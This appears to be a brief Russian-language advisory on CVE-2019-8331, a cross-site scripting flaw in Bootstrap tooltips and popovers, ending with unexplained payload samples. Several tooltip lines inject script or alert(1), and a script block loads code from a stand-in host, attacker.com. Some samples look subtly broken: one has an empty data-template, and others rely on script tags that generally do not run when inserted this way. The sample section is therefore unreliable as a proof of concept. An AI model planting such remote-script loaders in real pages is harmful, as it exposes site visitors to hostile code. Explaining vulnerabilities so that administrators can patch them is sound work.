
ช่องโหว่ CVE-2019-8331
CVE-2019-8331 — это уязвимость безопасности типа межсайтового скриптинга (XSS), обнаруженная в Bootstrap, широко используемой библиотеке JavaScript для разработки веб-сайтов и мобильных приложений. Эта уязвимость возникает из-за того, что Bootstrap неправильно фильтрует данные, передаваемые через атрибут data-template элементов tooltip или popover, что позволяет злоумышленнику внедрить вредоносный код на веб-страницу.
Атака может произойти, если злоумышленник может управлять данными, отображаемыми в виде tooltip или popover. Когда пользователь активирует tooltip или popover, вредоносный код внедряется на страницу и может быть выполнен браузером пользователя.
Уязвимость исправлена в Bootstrap версии 4.3.1 и 5.0.0-beta2. Администраторам следует обновить уязвимые версии Bootstrap для устранения этой уязвимости.
Дополнительные сведения об уязвимости CVE-2019-8331:
<x data-toggle="tooltip" data-template="">XSS</x>
<x data-toggle="tooltip" data-html="true" title='<script>alert(1)</script>'>XSS</x>
<x data-toggle="tooltip" data-html="true" data-content='<script>alert(1)</script>'>XSS</x>
<script>
var script = document.createElement("script");
script.src = "https://attacker.com/malicious.js";
document.body.appendChild(script);
</script>